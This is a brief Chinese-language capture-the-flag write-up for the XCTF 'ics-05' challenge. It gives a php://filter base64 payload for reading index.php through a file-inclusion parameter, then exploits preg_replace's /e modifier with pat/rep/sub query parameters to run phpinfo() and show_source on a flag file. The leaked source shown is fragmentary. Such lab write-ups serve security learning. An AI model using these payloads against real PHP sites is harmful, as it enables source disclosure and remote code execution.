xctf ics-05 wp

今天刚考完数据库就来刷体了很累所以做了很久
诶还是不够仔细啊没有认真的做出来

应该直接想到任意文件读取的诶
page=php://filter/read=convert.base64-encode/resource=index.php
爆出源码:

                




    
    
    
    
    
    
    



    

        
云平台设备维护中心
    
    

        
设备列表
    
    
    
    
    
    



    




    

        

    






        




        

            

                 0) {
                    die();
                }

                if (strpos($page, 'ta:text') > 0) {
                    die();
                }

                if (strpos($page, 'text') > 0) {
                    die();
                }

                if ($page === 'index.php') {
                    die('Ok');
                }
                    include($page);
                    die();
                ?>
        
        





Welcome My Admin ! 
";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}





?>

之后就会想到这个函数preg_replace() 的漏洞
/e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码（在适当的逆向引用替换完之后）。
我们就可以将参数这么设置
pat=/test/e&rep=phpinfo()&sub=jutst%20test
这里的路径是试出来的show_source(’/var/www/html/s3chahahaDir/flag/flag.php’)
将上面的phpinfo()替换成show_source(’/var/www/html/s3chahahaDir/flag/flag.php’)

恩就是这样